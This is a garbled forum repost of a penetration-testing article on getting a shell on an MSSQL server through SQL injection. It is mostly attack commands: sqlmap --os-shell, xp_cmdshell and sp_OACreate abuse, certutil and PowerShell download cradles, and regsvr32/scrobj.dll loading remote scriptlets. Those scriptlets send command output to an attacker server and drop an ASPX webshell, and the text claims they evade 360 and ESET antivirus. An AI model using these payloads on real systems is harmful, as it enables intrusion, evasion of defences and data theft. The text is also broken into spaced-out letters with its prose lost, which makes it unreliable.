搜索

[6085] 2019-08-10_通过Regsvr32的ole绕过Getshell小技巧

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-17
2019-08-10_通过Regsvr32的ole绕过Getshell小技巧 R e g s v r 3 2 o l e G e t s h e l l R v n 0 x s y   E   2 0 1 9 - 0 8 - 1 0 1 . 使 2 .   S Q L s q l m a p D B A M S S Q L s q l m a p . p y   - u   " h t t p : / / x x x . c o m / x x x / x x x . a s p x ? y u m = x x & x x = x x "   - p   y h m   - - r a n d o m - a g e n t   - - c o o k i e = ' A S P . N E T _ S e s s i o n I d = x x x x ' - - o s - s h e l l [ 1 8 : 3 9 : 2 3 ]   [ I N F O ]   c h e c k i n g   i f   x p _ c m d s h e l l   e x t e n d e d   p r o c e d u r e   i s   a v a i l a b l e ,   p l e a s e   w a i t . . x p _ c m d s h e l l   e x t e n d e d   p r o c e d u r e   d o e s   n o t   s e e m   t o   b e   a v a i l a b l e .   D o   y o u   w a n t   s q l m a p   t o   t r y   t o   r e - e n a b l e   i t ?   [ Y / n ]   Y [ 1 8 : 3 9 : 2 5 ]   [ W A R N I N G ]   x p _ c m d s h e l l   r e - e n a b l i n g   f a i l e d 1 .   x p _ c m d s h e l l E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E ; e x e c   m a s t e r . . x p _ c m d s h e l l   " w h o a m i " 2 .   O L E   A u t o m a t i o n
x p _ c m d s h e l l s q l m a p s p _ O A C r e a t e s p _ O A C r e a t e E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ;     R E C O N F I G U R E   W I T H   O V E R R I D E ;     E X E C   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s ' ,   1 ; R E C O N F I G U R E   W I T H   O V E R R I D E ;     E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   0 ; d e c l a r e   @ s h e l l   i n t   e x e c   s p _ o a c r e a t e   ' w s c r i p t . s h e l l ' , @ s h e l l   o u t p u t   e x e c   s p _ o a m e t h o d   @ s h e l l , ' r u n ' , n u l l , ' c : w i n d o w s s y s t e m 3 2 c m d . e x e   / c   w h o a m i   > C : w h o . t x t ' s p _ o a c r e a t e 0 1 3 .   D N S   L o g
o s - s h e l l n s l o o k u p   x x x x x . n e t b u r p
D N S T C P . . . 使 c e r t u t i l b i t s a d m i n . . . $   p y t h o n 3   - m   h t t p . s e r v e r o s - s h e l l > c e r t u t i l   - u r l c a c h e   - s p l i t   - f   h t t p : / / x x x : 8 0 0 0 / r e v e r s e _ t c p p o w e r s h e l l b e a c o n c o b a l t   s t r i k e 4 .   R e g s v r 3 2 . . . p o w e r s h e l l . e x e   - n o p   - w   h i d d e n   - c   " I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / x x . x x . x x . x x / a 2 2 ' ) ) " r e g s v r 3 2   / s   / n   / u   / i : h t t p : / / x . x . 0 . x : 8 0 8 0 / z f g J r h 6 V . s c t   s c r o b j . d l l m s h t a   h t t p : / / x x x . x x . x x . x x / 1 . h t a m s f   e x p l o i t / m u l t i / s c r i p t / w e b _ d e l i v e r y p o w e r s h e l l d o w n l o a d + i e x H T T P   L o g
< ? X M L   v e r s i o n = " 1 . 0 " ? > < s c r i p t l e t >       < r e g i s t r a t i o n   p r o g i d = " d 0 8 c 9 6 "   c l a s s i d = " { c e a 4 6 5 8 1 - c 3 4 4 - 4 1 5 7 - b 8 9 1 - 3 0 f 3 5 8 f 1 5 2 2 d } "   >               < s c r i p t   l a n g u a g e = " v b s c r i p t " > < ! [ C D A T A [ S u b   g e t N a m e ( n a m e )           D i m   h t t p       S e t   h t t p   =   C r e a t e O b j e c t ( " M s x m l 2 . S e r v e r X M L H T T P " )       h t t p . o p e n   " G E T " , " h t t p : / / x x x . x x x . x x x . x x x : 8 0 8 6 / " + n a m e ,   F a l s e       h t t p . s e n d E n d   S u b S u b   C m d ( c o m m a n d ) S e t   o S h e l l   =   C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) S e t   R e   =   o S h e l l . E x e c ( c o m m a n d ) D o   W h i l e   N o t   R e . S t d O u t . A t E n d O f S t r e a m       g e t N a m e   R e . S t d O u t . R e a d L i n e ( ) L o o p E n d   S u b C m d   " p o w e r s h e l l   - w   h i d d e n   - c   $ s = G e t - P r o c e s s ; $ p r o c e s s   = ' ' ; f o r e a c h   ( $ n   i n   $ s ) { $ p r o c e s s   + =   $ n . N a m e + ' | ' } $ B y t e s   = [ S y s t e m . T e x t . E n c o d i n g ] : : U n i c o d e . G e t B y t e s ( $ p r o c e s s ) ; $ E n c o d e d T e x t   = [ C o n v e r t ] : : T o B a s e 6 4 S t r i n g ( $ B y t e s ) ; W r i t e - H o s t   $ E n c o d e d T e x t ; e x i t ; " ] ] >               < / s c r i p t >       < / r e g i s t r a t i o n > < / s c r i p t l e t > w m i c   p r o c e s s   c a l l   c r e a t e   " r e g s v r 3 2   / s   / n   / u   / i : h t t p : / / x x x . x x x . x x x . x x x : 8 0 8 6 / p . t x t   s c r o b j . d l l "
E S T   N o d 3 2 3 6 0
< ? X M L   v e r s i o n = " 1 . 0 " ? > < s c r i p t l e t >       < r e g i s t r a t i o n   p r o g i d = " d 0 8 c 9 6 "   c l a s s i d = " { c e a 4 6 5 8 1 - c 3 4 4 - 4 1 5 7 - b 8 9 1 - 3 0 f 3 5 8 f 1 5 2 2 d } "   >               < s c r i p t   l a n g u a g e = " v b s c r i p t " > < ! [ C D A T A [ S u b   g e t N a m e ( n a m e )           D i m   h t t p       S e t   h t t p   =   C r e a t e O b j e c t ( " M s x m l 2 . S e r v e r X M L H T T P " )       h t t p . o p e n   " G E T " , " h t t p : / / x x x . x x x . x x x . x x x : 8 0 8 6 / " + n a m e ,   F a l s e       h t t p . s e n d E n d   S u b S u b   C m d ( c o m m a n d ) S e t   o S h e l l   =   C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) S e t   R e   =   o S h e l l . E x e c ( c o m m a n d ) D o   W h i l e   N o t   R e . S t d O u t . A t E n d O f S t r e a m       g e t N a m e   R e . S t d O u t . R e a d L i n e ( ) L o o p E n d   S u b C m d   " p o w e r s h e l l   - w   h i d d e n   - c   $ s = G e t - C h i l d I t e m   D : w e b 4 _ n e w ; $ p r o c e s s   = ' ' ; f o r e a c h   ( $ n   i n   $ s ) { $ p r o c e s s   + =   $ n . N a m e + ' | ' } $ B y t e s   = [ S y s t e m . T e x t . E n c o d i n g ] : : U n i c o d e . G e t B y t e s ( $ p r o c e s s ) ; $ E n c o d e d T e x t   = [ C o n v e r t ] : : T o B a s e 6 4 S t r i n g ( $ B y t e s ) ; W r i t e - H o s t   $ E n c o d e d T e x t ; e x i t ; " ] ] >               < / s c r i p t >       < / r e g i s t r a t i o n > < / s c r i p t l e t > W e b s h e l l
< ? X M L   v e r s i o n = " 1 . 0 " ? > < s c r i p t l e t >       < r e g i s t r a t i o n   p r o g i d = " d 0 8 c 9 6 "   c l a s s i d = " { c e a 4 6 5 8 1 - c 3 4 4 - 4 1 5 7 - b 8 9 1 - 3 0 f 3 5 8 f 1 5 2 2 d } "   >               < s c r i p t   l a n g u a g e = " v b s c r i p t " >               < ! [ C D A T A [ S e t   S h e l l   =   C r e a t e O b j e c t ( " W s c r i p t . S h e l l " ) S e t   P o s t   =   C r e a t e O b j e c t ( " M s x m l 2 . X M L H T T P " ) w f o l d e r   =   " C : i n e t p u b w w w r o o t x x x 1 1 1 e n g l i s h . a s p x " P o s t . O p e n   " G E T " , " h t t p : / / x x x . x x x x . x x x . x x x : 8 5 / b a k / e n g l i s h . t x t " , 0 P o s t . S e n d ( ) S e t   a G e t   =   C r e a t e O b j e c t ( " A D O D B . S t r e a m " ) a G e t . M o d e   =   3 a G e t . T y p e   =   1 a G e t . O p e n ( ) a G e t . W r i t e ( P o s t . r e s p o n s e B o d y ) a G e t . S a v e T o F i l e   w f o l d e r , 2               ] ] >               < / s c r i p t >       < / r e g i s t r a t i o n > < / s c r i p t l e t > t x t b e a c o n
5 .   S Q L - S Q L   S e r v e r   D B A 3 6 0 + E S E T   N O D 3 2   A n t i v i r u s r e g s v r 3 2 o l e V B s c r i p t 使 - - o s - s h e l l m s s q l   s e r v i c e a v - - o s - s h e l l p o w e r s h e l l s c t v b s v b s p o w e r s h e l l v b s p o w e r s h e l l p o w e r s h e l l b a s e 6 4 v b s h t t p   l o g g e t s h e l l 线
x p _ c m d s h e l l C r e a t e P r o c e s s   E r r o r   C o d e   5 s p _ o a c r e a t e s p _ o a c r e a t e o l e o l e r e g s v r 3 2 o l e v b s s p _ O A C r e a t e   p r o g i d ,   |   c l s i d , o b j e c t t o k e n   O U T P U T [   ,   c o n t e x t   ] d e c l a r e   @ s h e l l   i n t   e x e c   s p _ o a c r e a t e   ' w s c r i p t . s h e l l ' , @ s h e l l   o u t p u t   e x e c   s p _ o a m e t h o d   @ s h e l l , ' r u n ' , n u l l , ' c : w i n d o w s s y s t e m 3 2 c m d . e x e   / c   w h o a m i   > C : w h o . t x t ' ' w s c r i p t . s h e l l ' o l e 6 .   1 3 - 3 5 K 2 + 广  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理